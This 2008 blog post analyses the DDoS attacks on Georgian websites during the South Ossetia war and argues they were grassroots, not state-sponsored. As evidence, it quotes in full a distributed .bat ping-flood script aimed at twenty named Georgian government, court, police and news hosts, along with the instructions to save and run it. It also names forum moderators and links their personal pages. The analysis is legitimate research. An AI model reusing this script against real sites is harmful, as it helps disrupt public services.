Tuesday, August 19, 2008

Evidence that Georgia DDOS attacks are "populist" in nature

I've speculated to the press a couple times that the attacks against websites in Georgia are most likely populist in nature rather than state sponsored. It seemed time to provide more complete evidence.

If you aren't familiar with the conflict between Georgia and South Ossetia, the Wikipedia article actually has some interesting, if slanted, background. Since 1992, South Ossetia has been trying to secede, with its most recent vote on the issue in 2006. On April 13, 2007 Georgia gave in and allowed the self-named "Alternative Government of South Ossetia" to be recognized as the "Provisional Administration of South Ossetia", and on May 10, Dmitry Sanakoyev was appointed the head of the administrative entity.

After Georgia attempted to join NATO in April of 2008, Senators Joseph Biden and Richard Lugar, who were co-sponsors of the Senate Resolution 523, which declared the support of the US Senate for allowing both the Ukraine and the Republic of Georgia to join, issued a press release regarding Russia's strongly voiced opposition to the move. According to the press release, President Putin had gone so far as to threaten nuclear war on the Ukraine if they joined NATO, and promised to "subvert the territorial integrity of Georgia" if it continued in its efforts.

On June 4, 2008, Biden and Lugar passed another Senate Resolution, this time condemning Russia for their use of "threatening rhetoric, military brinksmanship, and economic boycotts to intimidate and undermine the Georgian governmnet."

This Biden Press Release explains:

In April, the Russian Federation established official ties with the Georgian breakaway regions of Abkhazia and South Ossetia in order to intentionally subvert reconciliation efforts between these regions and the Georgian government. Russia has also engaged in a series of provocative military stunts including shooting down a Georgian plane.
The United State must lead an intensive international diplomatic counter-offensive against Russia's efforts to destabilize Georgia and the region.

The scenario that has unfolded on the Internet is very similar to that which anticipated the Russian-Estonian DDOS attacks in April and May of 2007. At that time, President Putin's opposition to Estonia's removal of the Bronze Soldier was spread in the Moscow Times and other places, speaking of how the Estonian's had betrayed Putin's own father, a member of the NKVD sabotage unit who had been in Estonia fighting the Nazis. After the will of the President was made known, the cause was taking up by Russian youth organizations, fiercely loyal to their president, and well-versed in the ways of the Internet. Groups like Nashi, Young Russia, Mestniye and others distributed scripts on the web forums their members frequented, inviting them to participate in an "Internet War" (Интернет-войне), and providing them with a simple script which could be run as a ".bat" file on their computers, which would cause their machines to participate in a DDOS against Estonia.

A script which is almost exactly like the script which I've now found on hundreds of Russian language webpages where readers are being encouraged to run on their own computers, being distributed in archive files with names such as "ossetia.zip

"Yandex Clubs", similar to Facebook Groups have been started, with names such as:

Разбираем Политику - Война в Грузии!

which translates to: "We dismantle politics - War in Georgia!"

That group currently has 937 members and is lead by three moderators who use the names:

"intersolar-direct". (Intersolar works for an advertising company of the same name).

"politican" (you can see Politican's photo album here: http://fotki.yandex.ru/users/rfvxeuf/)

"agjul-2000" (who collects photos of children and puppies when he's not declaring Cyber wars, see: http://ajgul-2000.ya.ru/?ncrnd=4295 )

A search on "yandex.ru", which is perhaps similar to a Russian language Yahoo, found hundreds of webpages where posts containing "ping commands" designed to DDOS the site "president.gov.ge". You can do the search yourself like this:


or even on google.ru:


© bash

Хочешь поддержать Южную Осетию в Интернет-войне?
Вставь в текстовый файл следующий текст

(Gar-translation: Want to support South Ossetia in the Internet-war?
Insert the following into a text file)

@echo off
@echo Call this file (MSK) 18:00, 20:00
@echo Thanks for support of South Ossetia! Please, transfer this file to the friends!

start ping newsgeorgia.ru -t -l 1024
start ping apsny.ge -t -l 1024
start ping nukri.org -t -l 1024
start ping opentext.org.ge -t -l 1024
start ping messenger.com.ge -t -l 1024
start ping president.gov.ge -t -l 1024
start ping government.gov.ge -t -l 1024
start ping parliament.ge -t -l 1024
start ping nsc.gov.ge -t -l 1024
start ping constcourt.gov.ge -t -l 1024
start ping supremecourt.ge -t -l 1024
start ping cec.gov.ge -t -l 1024
start ping nbg.gov.ge -t -l 1024
start ping nplg.gov.ge -t -l 1024
start ping police.ge -t -l 1024
start ping mod.gov.ge -t -l 1024
start ping mes.gov.ge -t -l 1024
start ping mfa.gov.ge -t -l 1024
start ping iberiapac.ge -t -l 1024
start ping mof.ge -t -l 1024

Сохрани с расширением.bat и запускай!

(Gar-translation: Now save with a ".bat" extension and launch!)

The script above was being distributed on a Russian hacker board on August 12th.

Here is a rather typical posting . . . I apologize for my poor translation, using a computer for that:


The poster says:

I ask the administrators not to delete my communication. From the Soviet Information ministry, 8 August 2008: Georgian troops DISLOYALLY attacked South Ossetia completely annihilating the city of Tskshinvali. Under the rubble of the blasted buildings reside THOUSANDS OF PEOPLE and HUNDREDS OF RUSSIANS! They cannot leave because the city is filled with snipers! It is time for us to to join the war! Georgia has begun a war with Russia and is spreading false information from their government. Call to settle this with a DDOS-attack

He goes on to list a script similar to the one above which would attack eight different government websites in Georgia. So, this poster's plea to his readers is - Russians are dying - the Georgian government is lying about it - we can stop them from spreading these lies by DDOS'ing the government websites.

Other posters have used other forms of argument to convince their fellow Russians this is the right course of action, but I would consider this "typical behavior".

So . . . to get back to the question "is this a state-sponsored cyber attack"? I'm not sure we agree on what that question means. If the question is "is the Russian government attacking the websites of Georgia", I think its fairly obvious the answer is "No."

Has the government used its voice in the media to create a popular tension, where the average citizen believes that allowing Georgia to join NATO will weaken "Common Russia", as the phrase is being used, and that splintering Georgia through support for South Ossetia will prevent that? "Certainly!"

And have some of those citizens started a grass-roots DDOS attack by distribution of scripts such as the one above? "Yes."

No comments:

Post a Comment

Trying a new setting. After turning on comments, I got about 20-30 comments per day that were all link spam. Sorry to require login, but the spam was too much.